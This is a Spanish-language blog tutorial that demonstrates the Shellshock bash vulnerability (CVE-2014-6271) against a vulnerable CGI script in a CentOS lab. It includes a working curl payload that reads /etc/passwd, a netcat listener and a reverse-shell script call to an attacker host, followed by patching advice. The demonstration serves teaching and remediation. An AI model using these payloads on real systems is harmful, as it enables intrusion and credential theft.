Inicio > Manuales y tutoriales > Proof Of Concept CVE-2014-6271 Remote exploit vulnerability in bash

Proof Of Concept CVE-2014-6271 Remote exploit vulnerability in bash

Shellshock

Una vulnerabilidad explotable de forma remota  ha sido descubierta el dia de ayer (2014-09-24), esta afecta específicamente a bash en Linux. La vulnerabilidad ha sido identificada por  CVE CVE-2014-6271 , también se le ha dado el seudonimo de A.K.A.  Shellshock

Esta vulnerabilidad afecta a casi todas  distribuciones de Linux:

Red Hat Enterprise Linux (versiones 4 a 7) y la distribución Fedora
CentOS (versiones 5 a 7)
Ubuntu 10.04 LTS, 12.04 LTS y 14.04 LTS
Debian

En esta caso vamos a desarrollar una prueba de concepto P.O.C. con un entorno Linux Centos 5.9

 

1.- Verificar la configuración de CGI por Apache

#vim /etc/httpd/conf/httpd.conf

Shellshock

2.- Agregar nuestro CGI POC Vulnerable

#vim /var/www/cgi-bin/test.cgi

Shellshock

3.- Verificar que el CGI funciona

Ingresamos a la URL :  http://192.168.88.226/cgi-bin/test.cgi

 

 

Shellshock

4.- Ahora vamos a explotar la vulnerabilidad desde un Kali Linux

POC Nro 1 :  Volcando Passwd del servidor remoto

#curl -A «() { foo;};echo;/bin/cat /etc/passwd» http://192.168.88.226/cgi-bin/test.cgi

 

Shellshock

POC Nro 2 : Generando un shell reverso

Para esto he escrito un pequeño script en bash 😀  publicado aquí  : http://pastebin.com/0BQRb1D2

Paso 1 : Abrimos nuestro puerto a la escucha con Netcat (#nc -lp 8080 -vvv)

shelllock

Paso 2: ejecutamos el script de la siguiente forma :  #./little-shellshock-reverse.sh localhostIP attackhostIP

shellshock

 

Volvemos a la terminal donde tenemos a la escucha el puerto con Netcat y veremos que se ha generado nuestra shell reversa

shelllock

 

PARCHES Y VECTORES

– Se recomienda desactivar cualquier script CGI

– Es posible que tambien se pueda user como vector el servicio DHCP como se muestra aquí :

https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/

– Realizar la actualización urgente ,

Centos y derivados : #yum update -y bash.

Debian y Ubuntu :  #sudo apt-get update && sudo apt-get install –only-upgrade bash

 

 

 

 

 

Anuncio publicitario
Categorías: Manuales y tutoriales
  1. juan
    diciembre 13, 2014 a las 1:26 am

    Hola,

    Muy buen artículo, muy al grano.

    Pero soy novato y tengo dudas:

    Si no hacemos los 3 primeros pasos(1º PoC), entonces ¿Cómo continuamos con las otras PoC?
    o sea ¿Cómo explotar la vulnerabilidad desde únicamente Kali?

    Saludos,

  1. No trackbacks yet.

Deja una respuesta

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Salir /  Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Salir /  Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Salir /  Cambiar )

Conectando a %s

A %d blogueros les gusta esto: